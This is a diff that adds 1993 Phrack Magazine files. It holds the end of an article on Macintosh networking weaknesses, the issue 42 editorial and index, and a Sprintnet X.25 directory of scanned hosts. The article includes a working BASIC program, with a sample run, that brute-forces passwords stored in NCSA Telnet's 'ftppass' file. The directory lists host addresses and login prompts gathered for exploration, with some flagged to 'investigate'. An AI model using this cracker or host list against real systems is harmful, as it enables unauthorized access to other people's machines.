+a program like NokNok which notifies you when someone is using your Mac.
+
+
+NCSA TELNET
+~~~~ ~~~~~~
+5) The NCSA Telnet application allows a user to use his or her Mac as a telnet
+client and wander around the Internet.  NCSA Telnet also handles incoming FTP
+requests.  While this FTP function is easily disabled, many users keep it on
+because they either use it regularly or don't even know it exists.
+
+* Anyone with a valid username/password can log in to the Mac via FTP and then
+change to the "root" directory and perform the normal FTP functions.. both send
+and receive.  This means that *every* file on the Mac can be accessed from
+*anywhere* on the Internet.  It should be noted that NCSA Telnet does not log
+the "who & where" information, meaning there is no log of who used the machine,
+meaning there is no way for an intruder to be "caught."
+
+* The file "ftppass" contains the list of users allowed to use FTP on that
+Macintosh.  If, by using one of the methods mentioned above, someone is able to
+access it, it is easily cracked as it has a rather pathetic encryption scheme:
+the data fork contains the user's name, a colon, and then an encrypted
+password.  The password is easily decrypted; unless it is the entire 10
+characters, the last few characters are in order.  That is, the next ASCII code
+is 1 + the previous, etc.  Observe this from my "ftppass" file:
+
+sample:ucetcr&'()
+
+The first part, "sample," is the user's name.  The colon is the basic UNIX-like
+delimiter, the rest is the password.  The "real" part of the password is the
+characters "ucetcr" ... the remaining "&'()" are just spaces... how do you
+tell?  It's in ASCII order.  Look up "&" on an ASCII chart and "'" will follow,
+then "(" then ")" .. you get the idea.
+
+This password can be discovered by short program XORing the encrypted
+characters with a number between 0 and 255.  The program can either a) dump all
+XOR results or b) if the password is not the maximum length, the program can
+simply scan for a "space" [ASCII 032 decimal] in the password and print it.
+The following "cracking" program is written in BASIC [hey, does anyone use that
+any more?] and will allow you to decrypt the passwords.  If you can tell that
+the password has spaces at the end, you can go ahead and delete line 110.
+Otherwise, leave that line in and use your brain [remember your brain?] to
+determine if the encrypted goop is a "real" word or just goop.
+
+5 REM "ftppass" brute-force hacker
+10 INPUT "Encrypted password:";I$
+20 FOR X=1 TO 255
+30 FOR Y=1 TO LEN(I$)
+40 Y$=MID$(I$,Y,1)
+50 YA=ASC(Y$)
+60 N=X XOR YA
+70 IF N=32 THEN F=1
+80 N$=N$+CHR$(N)
+90 NEXT Y
+100 IF F THEN ?"Possible password:"N$
+110 ?I$" 'encrypts' to "N$: REM U can delete this line if len<10
+120 N$="":F=0
+130 NEXT X
+140 ?"Finished."
+
+Sample run:  [with line 110 deleted]
+
+Encrypted password:ucetcr&'()		[gotta type the whole thing]
+Possible password:secret !./            [boy, that was tough!]
+Possible password:rdbsdu! /.
+Possible password:}km|kz./ !            [etc.. just smack ^C at this point.]
+
+So the password is "secret" [clever, no?]
+
+It should be noted that this program is rather inelegant as I haven't really
+reversed the algorithm, just written a brute-force "hacker" for it.  This is
+due to laziness on my part.  If I really wanted to do this properly, I would
+FTP to the NCSA anonymous site and leech the 700k+ of source and "reverse" it
+thataway.  I don't feel like doing that.  I am lazy.  This program works just
+dandy for me... [I suspect the encryption program uses the users' name to
+encrypt it, but I don't care enough to find out.]
+
+I should say that I don't wish to offend the makers of NCSA Telnet or call the
+application crap.  It is, indeed, an impressive piece of work; I simply feel
+that there are some aspects of it which could use improvement... if not in
+terms of security, then at least allowing the user to save selections to disk!
+
+BTW- I know that NCSA Telnet is also available for the IBM.  I haven't tested
+these with an IBM, but if it's a "true" port, these flaws should exist under
+the IBM version as well.
+
+                               - = - = - = - = -
+
+Well, that does it.  If you're a network coordinator and you're *still* sitting
+on your skinny ass after reading this, get the hell up and fix the problems.
+Don't be surprised to find someone running anonymously through your net,
+leeching files and generally contributing to moral laxity ...  I've seen it
+before -- it's not a pretty sight.
+
+And of course, if you run a network of any sort, you must encourage users to
+use different passwords on different machines and passwords that don't exist in
+a dictionary [gh0ds are we sick of hearing that!].. it will work wonders for
+security.  Every hacker knows the number of people who use ONE password to all
+of their different accounts is unbelievably high... and they make very good use
+of this oversight.
+
diff --git a/phrack42/1.txt b/phrack42/1.txt
new file mode 100644
index 0000000..5093aac
--- /dev/null
+++ b/phrack42/1.txt
@@ -0,0 +1,299 @@
+                              ==Phrack Magazine==
+
+                   Volume Four, Issue Forty-Two, File 1 of 14
+
+                                 Issue 42 Index
+                              ___________________
+
+                               P H R A C K   4 2
+
+                                 March 1, 1993
+                              ___________________
+
+        ~ Happy Anniversary Bill Cook & Tim Foley, we love you both! ~
+
+
+Here it is.  Amidst all the fanfare and hoopla, Phrack 42 leaps from
+your electronic mail box to infect your very soul.   It was just a few
+short years ago on this day that one of the greatest abuses of
+governmental authority took place in the happy little town of Austin,
+Texas.  This issue marks the three year anniversary of these raids and a
+hearty hello goes out to Bellcore, The United States Secret Service, and
+the US District Attorney's Office.
+
+As many of you have read previously, or otherwise heard through the
+electronic grapevines, Dispater is no longer editor of Phrack.  Your
+new editor, as I was most recently referred to so lovingly by
+my long-time friend John Lee on the alt.cyberpunk Usenet group:
+"the long hair and heavy metal beer drinking Texan that
+Bruce Sterling finds so .. ahem.. 'attractive'."  In case you don't get
+the joke, my name is Erikb, and I'm a hacker.
+
+There are a few very distinct differences beginning with this issue of
+Phrack.  First and foremost, Phrack is now registered with the Library
+of Congress, and has its own ISSN.  Yes, boys and girls, you can
+go to Washington, D.C. and look it up.  This adds a new era of
+legitimacy to Phrack in that with such a registration, Phrack should
+never again face any legal challenge that would bypass any paper
+based magazine.
+
+After much deliberation, I have concluded that Phrack
+will no longer provide the world's anti-hacker corporate and
+governmental types (IE: THE MAN) such valuable information for free.
+This will of course have absolutely no effect on YOU, the hackers of the
+world.  Phrack has always been, and will always continue to be yours to
+copy and distribute amongst yourselves without limitation, as long as
+the files retain unchanged and intact.
+
+Entities who register their subscriptions to Phrack will be providing
+valuable demographic information to Phrack and its readers on exactly
+who outside our community actually takes an active interest in us.
+Yes, it will also generate some income.  The proceeds of all monies
+earned by Phrack will be used to actually compensate contributors for
+articles of interest, and most importantly, help a certain person
+pay off the debt incurred by the twist of fate dealt him through his
+involvement with this publication in the past.  I have no interest in
+making any money off of Phrack, as if I were to show a profit, I would
+have to contribute to Tim Foley's expense account via the IRS and I have
+absolutely no desire to fund his antics further than I am already
+forced to.
+
+To keep things honest, any information about the financial affairs
+of Phrack will be made available to anyone who cares to write and
+ask.  Thus, we can all see if "THE MAN" is truly as ethical as he would
+have us believe, especially since our rate will be considerably
+less than many magazines (or military screwdrivers).
+
+Now, pertaining to "THE MAN."  Phrack does not care for you and the way
+you secretly read and profit from Phrack and then use the information
+contained within its files to oppress its publishers, contributors and
+readers.  Henceforth, anyone involved with any ties to a computer
+profession for any corporation, the military or the federal government,
+any person with any ties for any telecommunications company, network
+service provider or interconnect carrier, any person with any ties to
+any law enforcement body, federal, state or otherwise, any elected
+officials, attorneys, accountants or computer consultants of any kind
+must register your subscription immediately.  If you are unsure of your
+status with this regard, please contact us.  We are going to be VERY
+liberal about "special dispensations" since it is not our intention to
+screw anyone out of a subscription.
+
+-------------------------------------------------------------------------
+                       READ THE FOLLOWING
+
+               IMPORTANT REGISTRATION INFORMATION
+
+Corporate/Institutional/Government:  If you are a business,
+institution or government agency, or otherwise employed by,
+contracted to or providing any consultation relating to computers,
+telecommunications or security of any kind to such an entity, this
+information pertains to you.
+
+You are instructed to read this agreement and comply with its
+terms and immediately destroy any copies of this publication
+existing in your possession (electronic or otherwise) until
+such a time as you have fulfilled your registration requirements.
+A form to request registration agreements is provided
+at the end of this file.
+
+Individual User:  If you are an individual end user whose use
+is not on behalf of a business, organization or government
+agency, you may read and possess copies of Phrack Magazine
+free of charge.  You may also distribute this magazine freely
+to any other such hobbyist or computer service provided for
+similar hobbyists.  If you are unsure of your qualifications
+as an individual user, please contact us as we do not wish to
+withhold Phrack from anyone whose occupations are not in conflict
+with our readership.
+
+_______________________________________________________________
+
+Phrack Magazine corporate/institutional/government agreement
+
+   Notice to users ("Company"):  READ THE FOLLOWING LEGAL
+AGREEMENT.  Company's use and/or possession of this Magazine is
+conditioned upon compliance by company with the terms of this
+agreement.  Any continued use or possession of this Magazine is
+conditioned upon payment by company of the negotiated fee
+specified in a letter of confirmation from Phrack Magazine.
+
+   This magazine may not be distributed by Company to any
+outside corporation, organization or government agency.  This
+agreement authorizes Company to use and possess the number of copies
+described in the confirmation letter from Phrack Magazine and for which
+Company has paid Phrack Magazine the negotiated agreement fee.  If
+the confirmation letter from Phrack Magazine indicates that Company's
+agreement is "Corporate-Wide", this agreement will be deemed to cover
+copies duplicated and distributed by Company for use by any additional
+employees of Company during the Term, at no additional charge.  This
+agreement will remain in effect for one year from the date of the
+confirmation letter from Phrack Magazine authorizing such continued use
+or such other period as is stated in the confirmation letter (the "Term").
+If Company does not obtain a confirmation letter and pay the applicable
+agreement fee, Company is in violation of applicable US Copyright laws.
+
+    This Magazine is protected by United States copyright laws and
+international treaty provisions.  Company acknowledges that no title to
+the intellectual property in the Magazine is transferred to Company.
+Company further acknowledges that full ownership rights to the Magazine
+will remain the exclusive property of Phrack Magazine and Company will
+not acquire any rights to the Magazine except as expressly set
+forth in this agreement.  Company agrees that any copies of the
+Magazine made by Company will contain the same proprietary
+notices which appear in this document.
+
+    In the event of invalidity of any provision of this agreement,
+the parties agree that such invalidity shall not affect the validity
+of the remaining portions of this agreement.
+
+    In no event shall Phrack Magazine be liable for consequential, incidental
+or indirect damages of any kind arising out of the delivery, performance or
+use of the information contained within the copy of this magazine, even
+if Phrack Magazine has been advised of the possibility of such damages.
+In no event will Phrack Magazine's liability for any claim, whether in
+contract, tort, or any other theory of liability, exceed the agreement fee
+paid by Company.
+
+    This Agreement will be governed by the laws of the State of Texas
+as they are applied to agreements to be entered into and to be performed
+entirely within Texas.  The United Nations Convention on Contracts for
+the International Sale of Goods is specifically disclaimed.
+
+    This Agreement together with any Phrack Magazine
+confirmation letter constitute the entire agreement between
+Company and Phrack Magazine which supersedes any prior agreement,
+including any prior agreement from Phrack Magazine, or understanding,
+whether written or oral, relating to the subject matter of this
+Agreement.  The terms and conditions of this Agreement shall
+apply to all orders submitted to Phrack Magazine and shall supersede any
+different or additional terms on purchase orders from Company.
+
+_________________________________________________________________
+
+            REGISTRATION INFORMATION REQUEST FORM
+
+
+We have approximately __________ users.
+
+We desire Phrack Magazine distributed by (Choose one):
+
+Electronic Mail: _________
+Hard Copy:       _________
+Diskette:        _________  (Include size & computer format)
+
+
+Name:_______________________________  Dept:____________________
+
+Company:_______________________________________________________
+
+Address:_______________________________________________________
+
+_______________________________________________________________
+
+City/State/Province:___________________________________________
+
+Country/Postal Code:___________________________________________
+
+Telephone:____________________   Fax:__________________________
+
+
+Send to:
+
+Phrack Magazine
+603 W. 13th #1A-278
+Austin, TX 78701
+-----------------------------------------------------------------------------
+
+
+As many of you can imagine, this will be very hard to enforce.
+This is not our main concern, as people who choose to ignore
+this stipulation are in direct violation of applicable US
+Copyright laws and therefore are just as unethical and guilty as
+they have always claimed we are.
+
+It would be an ironic turn of events should the FBI actually have to
+conduct raids against companies like Bellcore for harboring illegal
+copies of Phrack Magazine.  If, in your travels, you happen to see
+such an occurrence, feel free to let us know. :)
+
+Enjoy the magazine.  It is for and by the hacking community.  Period.
+
+
+      Editor-In-Chief : Erik Bloodaxe (aka Chris Goggans)
+                3L33t : K L & T K
+                 News : Datastream Cowboy
+          Photography : Restricted Data Transmissions & dFx
+            Publicity : (Please, God, no more press)
+    Prison Consultant : The English Prankster
+    Creative Stimulus : Sandoz, Buena Vista Studios, The Sundays
+                Mooks : Dave & Bruce
+            Librarian : Minor Threat
+            Thanks To : Professor Falken, Vince Niel, Skylar
+                        Rack, NOD, G. Tenet, Frosty
+         No Thanks To : Scott Chasin (who didn't even care)
+
+
+Phrack Magazine V. 4, #42, March 1, 1993.     ISSN 1068-1035
+Contents Copyright (C) 1993 Phrack Magazine, all rights reserved.
+Nothing may be reproduced in whole or in part without written
+permission of the Editor-In-Chief.  Phrack Magazine is made available
+quarterly to the amateur computer hobbyist free of charge.  Any
+corporate, government, legal, or otherwise commercial usage or
+possession (electronic or otherwise) is strictly prohibited without
+prior registration, and is in violation of applicable US Copyright laws.
+
+                    Phrack Magazine
+                    603 W. 13th #1A-278
+                    Austin, TX 78701
+
+                    phrack@well.sf.ca.us
+
+Submissions to the above email address may be encrypted
+with the following key : (Not that we use PGP or encourage its
+use or anything.  Heavens no.  That would be politically-incorrect.
+Maybe someone else is decrypting our mail for us on another machine
+that isn't used for Phrack publication.  Yeah, that's it.   :) )
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.1
+
+mQCNAiuIr00AAAEEAMPGAJ+tzwSTQBjIz/IXs155El9QW8EPyIcd7NjQ98CRgJNy
+ltY43xMKv7HveHKqJC9KqpUYWwvEBLqlZ30H3gjbChXn+suU18K6V1xRvxgy21qi
+a4/qpCMxM9acukKOWYMWA0zg+xf3WShwauFWF7btqk7GojnlY1bCD+Ag5Uf1AAUR
+tCZQaHJhY2sgTWFnYXppbmUgPHBocmFja0B3ZWxsLnNmLmNhLnVzPg==
+=q2KB
+-----END PGP PUBLIC KEY BLOCK-----
+
+
+
+  -= Phrack 42 =-
+ Table Of Contents
+ ~~~~~~~~~~~~~~~~~
+ 1. Introduction by The Editor                                 14K
+ 2. Phrack Loopback / Editorial Page / Line Noise              48K
+ 3. Phrack Pro-Phile on Lord Digital                           22K
+ 4. Packet Switched Network Security by Chris Goggans          22K
+ 5  Tymnet Diagnostic Tools by Professor Falken                35K
+ 6. A User's Guide to XRAY by NOD                              11K
+ 7. Useful Commands for the TP3010 Debug Port by G. Tenet      28K
+ 8. Sprintnet Directory Part I by Skylar                       49K
+ 9. Sprintnet Directory Part II by Skylar                      45K
+10. Sprintnet Directory Part III by Skylar                     46K
+11. Guide to Encryption by The Racketeer [HFC]                 32K
+12. The Freedom Of Information Act and You by Vince Niel       42K
+13. HoHoCon from Various Sources                               51K
+14. PWN by Datastream Cowboy                                   29K
+
+                                                      Total:  474K
+
+     Phrack 42 is dedicated to John Guinasso, director of global
+     network security, BT North America, without whose immortal comments,
+     many would have never been motivated to write.
+
+     "If you mess with our network and we catch you -- which we always
+     do -- you will go down."  (John Guinasso, Information Week, July 13, 1992)
+
+     "Hell, WE owned Tymnet before BT did!"
+     (Anonymous hacker-type, Random Telephone Call, 1993)
+
+_______________________________________________________________________________
diff --git a/phrack42/10.txt b/phrack42/10.txt
new file mode 100644
index 0000000..f79eb05
--- /dev/null
+++ b/phrack42/10.txt
@@ -0,0 +1,1468 @@
+                          ==Phrack Magazine==
+
+             Volume Four, Issue Forty-Two, File 10 of 14
+
+                     <Sprintnet Directory Part 3>
+
+
+602  -  Arizona  Scanned: [0 - 300]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+602 22   $             outdial?
+602 23   $             outdial?
+602 26   $             outdial (602)
+602 35   $             MSG 1: COMMAND INVALID FROM PHTIB010
+602 145  $             PSI Please enter our X.29 Password:
+602 148  *
+602 155.2  VAX/VMS     This is DTAC02 - VAX/VMS V5.5    
+602 165  *
+602 166 
+602 167  *
+ 
+ 
+ 
+ 
+603  -  New Hampshire  Scanned: [0 - 300]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+603 20   $             Dartmouth College Time Sharing, D1
+603 31   $             outdial
+603 40   $             DTC01, IP 130.010.200.023
+603 46                 USER NUMBER--
+603 47   *
+603 60     VAX/VMS
+603 61                 **** Invalid sign-on, please try again ****
+603 62                 **** Invalid sign-on, please try again ****
+603 63                 **** Invalid sign-on, please try again ****
+603 68 
+603 135    VM/CMS      ENTERPRISE SYSTEMS ARCHITECTURE--ESA370
+603 136    VM/CMS      ENTERPRISE SYSTEMS ARCHITECTURE--ESA370 
+603 142  *
+ 
+ 
+ 
+ 
+609  -  New Jersey  Scanned: [0 - 500]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+609 41                 WHAT SERVICE PLEASE????
+609 42                 WHAT SERVICE PLEASE????
+609 46                 WHAT SERVICE PLEASE????
+609 73   $ DTC         DTC01.DOMAIN.ORGANIZATION
+609 100    Prime
+609 120    Prime
+609 135  *
+609 138    Prime       PRIMENET 23.0.0 HCIONE
+609 170    Prime
+609 232  *
+609 235    VAX/VMS     TMA Information Services 
+609 238  *
+609 239  *
+609 242                WHAT SERVICE PLEASE????
+609 243                WHAT SERVICE PLEASE????
+609 244                WHAT SERVICE PLEASE????
+609 245  *
+609 246  *
+609 247  *
+609 259 
+ 
+ 
+ 
+ 
+611  -  unknown  Scanned: various     
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+611 20 
+611 21 
+611 25                 ? (Transend?)
+611 26                 ?
+611 27                 ?
+611 28                 ?
+611 50                 SYSTEM AVAILABLE FOR YOUR USE
+611 55                 SYSTEM AVAILABLE FOR YOUR USE
+611 90     VAX/VMS     Username:
+611 120    VAX/VMS     Username: 
+611 192    Prime
+611 193    Prime
+611 194    Prime
+611 195    Prime
+611 230    VAX/VMS
+611 231    VAX/VMS
+611 232    VAX/VMS
+611 233    VAX/VMS
+611 234    AOS         MHCOMET System A  
+611 235    AOS         MHCOMET System B  
+611 236    AOS         MHCOMET System C
+611 238    AOS         MHCOMET System D 
+ 
+ 
+ 
+ 
+612  -  Minnesota  Scanned: [0 - 1000]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+612 22   $             
+612 23                 Westlaw
+612 37                 Westlaw
+612 52   $ Prime       C>
+612 56                 Westlaw
+612 57                 Westlaw
+612 58                 Westlaw
+612 78   *
+612 79   *
+612 120  *
+612 121  *
+612 134  *
+612 135  *
+612 138  *
+612 158                Westlaw
+612 171  *
+612 236 
+612 240    GS/1        MSC X.25 Gateway
+612 241  *
+612 259    VAX/VMS     System LPCOMB - VAX/VMS V5.5-1  
+612 260  $ CDCNET      Control Data Arden Hills CDCNET Network **investigate**
+612 270                Westlaw
+612 271                Westlaw
+612 272                Westlaw
+612 273                Westlaw
+612 277                Password > 
+612 279                Westlaw
+612 353                ENTER ID  (Westlaw)
+612 362                Westlaw
+612 363                Westlaw
+612 364                Westlaw
+612 365                Westlaw
+612 366                Westlaw
+612 367                Westlaw
+612 368                Westlaw
+612 369                Westlaw
+612 385                Westlaw
+612 391                Westlaw
+612 393                Westlaw
+612 395                Westlaw
+612 395                Westlaw
+612 455  *
+612 456 
+612 457  *
+612 458  *
+612 460  *
+612 461  *
+612 462  *
+612 1030 *
+ 
+ 
+ 
+ 
+614  -  Ohio  Scanned: [0 - 300]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+614 21                 STN International!  Enter x:
+614 22   $             outdial (614)
+614 23   $             outdial (614)
+614 31                 STN International!  Enter x:
+614 32                 STN International!  Enter x:
+614 34                 STN International!  Enter x:
+614 36   *
+614 65     Unix        all attempts monitored and reported
+614 140                STN International!  Enter x:
+614 145
+614 148A
+614 150A               MHP201A LPKMN001  APPLICATION:
+614 154A 
+614 155                User name?
+614 156                CONNECTED TO PACKET/94
+614 157  * 
+614 230    Port Selec? **investigate**
+ 
+ 
+ 
+ 
+617  -  Massachusetts  Scanned: 0 - 1500
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- -------------------------------------------------
+617 20     Prime       PRIMENET 23.3.0.R20 PBN27
+617 22     Prime       PRIMENET 22.0.0vA BDSD
+617 26   $             outdial (617)
+617 37     Prime       PRIMENET 23.3.0.R20 BDSH 
+617 47   $             ENTER ACCESS PASSWORD:
+617 48     VAX/VMS     Username:
+617 52     VAX/VMS     Username: 
+617 56   $             BEDPS:SCCHRV
+617 63     VM/CMS      IRI                     
+617 66     Prime       PRIMENET 23.3.0.R20 BDSK
+617 72     Prime       IRI System 2
+617 74     Prime       PRIMENET 23.3.0 ENB   
+617 78   *
+617 114  $ Prime       PRIMENET 23.2.0.R48 MD.B
+617 115  *
+617 136  $ DTC         DTCX25.BOS.WMC
+617 147  *
+617 149    VAX/VMS     Newton Headend Node MicroVAX (NWTNH2) 
+617 158    Prime       PRIMENET 23.2.0 BDSW  
+617 169    Prime       PRIMENET 22.0.0vA PBN36 
+617 178                Enter Application Request
+617 226    VM/CMS
+617 230  *
+617 234    Unix?       b1cs3!Username:
+617 235    VAX/VMS     Username:
+617 236    VAX/VMS     Username:
+617 237    Unix?       b1cs3!Username:
+617 250                ND X.29 Server - Press 'ESCAPE' to log in  
+617 255    Prime       PRIMENET 22.0.3vA PBN43 
+617 257  $ HP-3000
+617 270  $ VAX/VMS     COSMOS (CO6408)
+617 274  *
+617 279    Unix SysV   oa1cs1!x25 name:
+617 304    Prime       PRIMENET 23.3.0.R20 PBN67 
+617 306    Prime       PRIMENET 23.2.0 PBN53 
+617 308    Prime       PRIMENET 23.3.0.R20 PBN71 
+617 311  $             outdial (617)
+617 313  $             outdial (617)
+617 339  *
+617 340    VAX/VMS     FAXON
+617 341                Password: 
+617 346    VOS         STRATUS CUSTOMER ASSISTANCE CENTER
+617 348  *
+617 350    Prime       PRIMENET 23.2.0 PBN39 
+617 351    Prime       PRIMENET 22.0.0vA BDSU  
+617 373    VAX/VMS     FAXON
+617 379    ???         $$ 4200 MODEL:
+617 380    Prime       PRIMENET 22.1.4.R7 L01   
+617 381    Prime       PRIMENET 22.1.4.R7 P01   
+617 382    Prime       PRIMENET 22.1.4.R7 Y01   
+617 383    Prime       PRIMENET 22.1.4.R30 H02   
+617 384    Prime       PRIMENET 22.1.4.R7 V01   
+617 385    Prime       PRIMENET 22.1.4.R30 R01   
+617 387    Prime       PRIMENET 22.1.2.R22 B01   
+617 388    ???         $$ 4200 MODEL: 
+617 392    Prime       PRIMENET 22.1.4.R30 R04   
+617 393    Prime       PRIMENET 22.1.4.R7 Y04   
+617 397                U#=
+617 453    Prime       PRIMENET 22.0.3vA PBN35 
+617 454    Prime       PRIMENET 23.2.0 NORTON
+617 455    Prime       PRIMENET 23.3.r29.wg NER   
+617 457    Prime       PRIMENET 23.3.0 NNEB  
+617 458    Prime       PRIMENET 23.2.0.R32 CENTNE
+617 460  *
+617 474    Prime       PRIMENET 22.1.4 MD.FL1
+617 490    Prime       PRIMENET 23.3.0 ALBANY
+617 491    Prime       PRIMENET 23.2.0 CS    
+617 492    Prime       PRIMENET 23.0.0 FRMDLE
+617 493    Prime       PRIMENET 23.0.0 STMFRD
+617 498    Prime       PRIMENET 23.2.0 CS2NYC
+617 499    Prime       PRIMENET 23.2.0.R32 SYRA  
+617 502    Prime       PRIMENET 23.2.0 APPLE 
+617 516    Prime       PRIMENET 23.2.0.R39 PBN38 
+617 518    Prime       PRIMENET 23.2.0 PBN41
+617 519    Prime       PRIMENET 23.2.0.R39 PBN54 
+617 521    Prime       PRIMENET 22.0.3vA BDSG  
+617 530    ???         Maxlink International 
+617 534                dynapac: multi-pad.25
+617 541    Prime       PRIMENET 22.0.3vA BDSS  
+617 543    Prime       PRIMENET 22.0.3vA PBN33 
+617 551    Prime       PRIMENET 22.0.4.R7 CSP-A 
+617 553    Prime       PRIMENET 22.0.3vA BDSQ  
+617 555    Prime       PRIMENET 23.2.0 PBN72 
+617 558    Prime       PRIMENET 23.2.0.CSBETA2 CSSS.A
+617 560    Prime       PRIMENET 23.3.0.R20 BDSN  
+617 562    Prime       PRIMENET 22.1.4 BDSZ  
+617 563    Prime       LOGIN PLEASE (1)
+617 564    Prime       PRIMENET 22.0.3 MD.NE 
+617 575    Prime       PRIMENET 22.1.2 MF.NP1
+617 576    Prime       PRIMENET 22.0.1 B09   
+617 577    Prime       PRIMENET 22.1.1.R11 B30   
+617 578    Prime       PRIMENET 23.2.0.R3 SDSYSA
+617 583    Prime       PRIMENET 22.0.2 MD.HFD
+617 585    Prime       PRIMENET 23.2.0.R32 EDWIN 
+617 586    Prime       PRIMENET 23.2.0 BOSMET
+617 588  *
+617 589  *
+617 590  *
+617 593    Prime       PRIMENET 23.3.Beta2 BDSO  
+617 597    Prime       PRIMENET 22.0.3vA BDSB  
+617 641    AOS         Timeplace Inc.
+617 649                PaperChase
+617 654    Prime       IRI System 9
+617 710    Prime       PRIMENET 23.2.0 MD.ATL
+617 712    Prime       PRIMENET 23.3.0 PEANUT
+617 713    Prime       PRIMENET 23.3.0 PEACH 
+617 714    Prime       PRIMENET 23.3.0 NASH  
+617 715    Peime       PRIMENET 23.2.0 MD-BHM
+617 717    Prime       PRIMENET 23.1.0 ETHEL 
+617 719    Prime       PRIMENET 22.1.1.R11 PHILLY
+617 720    Prime       PRIMENET 22.1.2 CAMPHI
+617 723    Prime       PRIMENET 23.3.0 MD.NJ 
+617 724    Prime       PRIMENET 23.3.0 NYMCS 
+617 726    Prime       PRIMENET 23.3.0 NJCENT
+617 727    Prime       PRIMENET 22.0.1v NJPCS 
+617 750    Prime       PRIMENET 23.2.0 PBN75 
+617 752    Prime       PRIMENET 23.2.0 PBN68 
+617 850    Prime       PRIMENET 22.1.4 MD-CHI
+617 852    Prime       PRIMENET 23.3.0 CS-LP1
+617 853    Prime       PRIMENET 23.2.0 MD.SL1
+617 854    Prime       PRIMENET 23.2.0 MD.MKW
+617 855    Prime       PRIMENET 23.0.0 TRNGC 
+617 856    Prime       PRIMENET 23.2.0 CS-CHI
+617 857    Prime       PRIMENET 22.1.0 CS-OAK
+617 861    Prime       PRIMENET 22.1.3 PTCDET
+617 862    Prime       PRIMENET 23.3.0 DRBN1 
+617 863    Prime       PRIMENET 23.1.0 CSTROY
+617 864    Prime       PRIMENET 23.3.0 CS.DET
+617 865    Prime       PRIMENET 23.1.0 MD.DET
+617 868    Prime       PRIMENET 23.2.0 MD.GR 
+617 869    Prime       PRIMENET 22.1.1.R11 MD.CIN
+617 870    Prime       PRIMENET 23.2.0 CS.IND
+617 871    Prime       PRIMENET 22.1.3 MD.IND
+617 872    Prime       PRIMENET 23.2.0 MD-PIT
+617 874    Prime       PRIMENET 22.1.0 PITTCS
+617 875    Prime       PRIMENET 22.1.1.r35 MD-CLE
+617 902    Prime       PRIMENET 22.1.1.R11 MD.HOU
+617 908    Prime       PRIMENET 23.2.0 WMCS  
+617 910    Prime       PRIMENET 23.2.0 CSWDC 
+617 911    Prime       PRIMENET 23.2.0 VIENNA
+617 912    Prime       PRIMENET 23.2.0 BALT  
+617 915    Prime       PRIMENET 23.0.0 WDCRTS
+617 916    Prime       PRIMENET 23.0.0 CAP1  
+617 928    Prime       PRIMENET 23.3.0 CS.HOU
+617 930    Prime       PRIMENET 23.3.0 MD.AUS
+617 931    Prime       PRIMENET 23.3.0 CS-SCR
+617 932    Prime       PRIMENET 23.2.0.SCH CS.CS 
+617 936    Prime       PRIMENET 23.2.0 MD.DAL
+617 956    Prime       PRIMENET 22.1.0 RELAY 
+617 957    Prime       PRIMENET 22.1.3 ZULE  
+617 958    Prime       PRIMENET 23.1.0 EDOC1 
+617 962    Prime       PRIMENET 23.3.0.R20 PBN49 
+617 965    Prime       PRIMENET 22.0.3vA BDSE  
+617 966    Prime       PRIMENET 22.0.3vA BDST  
+617 978    Unix
+617 980    Prime       PRIMENET 22.1.1.R28 WUFPAK
+617 986
+617 991    Prime       PRIMENET 23.2.0 PBN64 
+617 995    Prime       PRIMENET 23.2.0.R3 ATC54 
+617 998    Prime       PRIMENET 23.0.0 TRNGB 
+617 1030 *
+617 1031 *
+617 1033 $             CONNECTED TO PACKET/94
+617 1035 $             T.S.S.G
+617 1054 $             Boston Safe Deposit and Trust Company
+617 1055   HP-3000     
+617 1075
+617 1099   Unix SysV   X.29 Terminal Service
+617 1202   Prime       PRIMENET 22.0.2 CSPLAN
+617 1204   Prime       PRIMENET 23.2.0 PBN70 
+617 1206   Prime       PRIMENET 23.2.0 PBN69 
+617 1207   Prime       PRIMENET 23.2.0 PBN73 
+617 1210   Prime       PRIMENET 23.2.0 PBN74 
+617 1211   Unix SysV                        
+617 1231               Primetec Leasing 
+617 1235   Prime       PRIMENET 23.2.0 PBN45 
+617 1260               dynapac: multi-pad.25
+617 1261               dynapac: multi-pad.25
+617 1262               dynapac: multi-pad.25
+617 1263               dynapac: multi-pad.25
+617 1264               dynapac: multi-pad.25
+617 1266               dynapac: multi-pad.25
+617 1267               dynapac: multi-pad.25
+617 1300   VAX/VMS     Username:
+617 1301   VAX/VMS     Username:
+617 1302               **** Invalid sign-on, please try again ****
+617 1303   VAX/VMS     Username: 
+617 1304               **** Invalid sign-on, please try again ****
+617 1305               **** Invalid sign-on, please try again ****
+617 1306               **** Invalid sign-on, please try again ****
+617 1307               **** Invalid sign-on, please try again ****
+617 1320   VAX/VMS     Username: 
+617 1321               **** Invalid sign-on, please try again ****
+617 1322               **** Invalid sign-on, please try again ****
+617 1323               **** Invalid sign-on, please try again ****
+617 1324               **** Invalid sign-on, please try again ****
+617 1331 *
+617 1333 *
+617 1334 *
+617 1335 *
+617 1336 *
+617 1337 *
+617 1338 *
+617 1339 *
+617 1340 *
+617 1341 *
+617 1350 *
+617 1351 *
+617 1355 *
+617 1356 *
+617 1365   VAX/VMS     Username: 
+617 1368   ???         Username(First Name):
+617 1371   VAX/VMS     Username:
+617 1379 *
+617 1441 *
+617 1442 *
+617 1455 *
+617 1456 *
+ 
+ 
+ 
+ 
+619  -  California  Scanned: 0 - 300
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- -------------------------------------------------
+619 38 
+619 41     VM/CMS
+619 51   *
